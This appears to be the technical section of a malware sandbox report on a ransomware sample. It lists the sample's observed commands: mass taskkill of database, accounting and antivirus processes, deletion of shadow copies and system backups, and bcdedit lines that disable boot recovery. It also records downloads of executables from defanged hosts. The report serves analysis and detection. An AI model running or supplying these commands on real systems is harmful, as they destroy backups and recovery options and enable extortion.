Technical Information
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM wxServer*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Creative Cloud*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Adobe Desktop Service*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM CoreSync*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Adobe CEF Helper*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM node*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM AdobeIPCBroker*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM sync-taskbar*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM sync-worker*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM InputPersonalization*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM AdobeCollabSync*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM BrCtrlCntr*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM BrCcUxSys*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM SimplyConnectionManager*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Simply.SystemTrayIcon*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM fbguard*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM fbserver*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM ONENOTEM*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM wrapper*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM ccEvtMgr*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM ccSetMgr*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM SavRoam*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Sqlservr*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM sqlagent*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM sqladhlp*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Culserver*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM RTVscan*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM sqlbrowser*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM acwebbrowser*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM QBIDPService*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM AutodeskDesktopApp*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM QBDBMgrN*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM QBFCService*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM QBVSS*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM sql*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM msaccess*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM mssql*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM mysql*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM wxServerView*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM sqlmangr*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM RAgui*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM supervise*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Culture*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Defwatch*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM winword*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM QBW32*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM QBDBMgr*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM qbupdate*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM axlbridge*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM httpd*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM fdlauncher*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM MsDtSrvr*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM java*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM 360se*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM 360doctor*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM wdswfsafe*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM fdhost*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM GDscan*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM ZhuDongFangYu*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM mysqld*
- '%WINDIR%\syswow64\taskkill.exe' /F /T /IM Intuit.QuickBooks.FCS*
- %TEMP%\27606.jpg
- %TEMP%\37794.exe
- http://fa###ook.com/
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://tl##net.top/p.jpg
- http://tl##net.top/ex64.exe
- DNS ASK fa###ook.com
- DNS ASK microsoft.com
- DNS ASK tl##net.top
- ClassName: '' WindowName: ''
- '%TEMP%\37794.exe'
- '%WINDIR%\syswow64\cmd.exe' /c start %TEMP%\27606.jpg' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start %TEMP%\27606.jpg
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM InputPersonalization*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM sync-worker*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM sync-taskbar*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM AdobeIPCBroker*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM node*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM BrCtrlCntr*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Adobe CEF Helper*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Adobe Desktop Service*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Creative Cloud*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM acwebbrowser*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM AutodeskDesktopApp*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM mysqld*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM QBDBMgrN*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM CoreSync*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM qbupdate*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM BrCcUxSys*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM sqlbrowser*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM RTVscan*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Culserver*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM sqladhlp*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM sqlagent*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Sqlservr*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM ZhuDongFangYu*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM AdobeCollabSync*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM ccEvtMgr*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM wrapper*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM ONENOTEM*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM fbserver*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM fbguard*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Simply.SystemTrayIcon*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM ccSetMgr*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM SimplyConnectionManager*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM GDscan*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM fdhost*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM wdswfsafe*
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin.exe Delete Shadows /All /Quiet
- '%WINDIR%\syswow64\cmd.exe' /C wmic.exe SHADOWCOPY DELETE /nointeractive
- '<SYSTEM32>\vssvc.exe'
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin DELETE SYSTEMSTATEBACKUP
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
- '%WINDIR%\syswow64\cmd.exe' /C bcdedit.exe /set {default} recoveryenabled No
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM QBIDPService*
- '%WINDIR%\syswow64\cmd.exe' /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM mysql*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM wxServer*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM QBFCService*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM QBVSS*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM sql*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM msaccess*
- '%WINDIR%\syswow64\cmd.exe' /C <SYSTEM32>\vssvc.exe
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM SavRoam*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM wxServerView*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM supervise*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM sqlmangr*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM 360doctor*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM 360se*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM java*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM MsDtSrvr*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM fdlauncher*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM RAgui*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM httpd*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM mssql*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM QBDBMgr*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM QBW32*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM winword*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Defwatch*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Culture*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM axlbridge*
- '%WINDIR%\syswow64\cmd.exe' /C taskkill /F /T /IM Intuit.QuickBooks.FCS*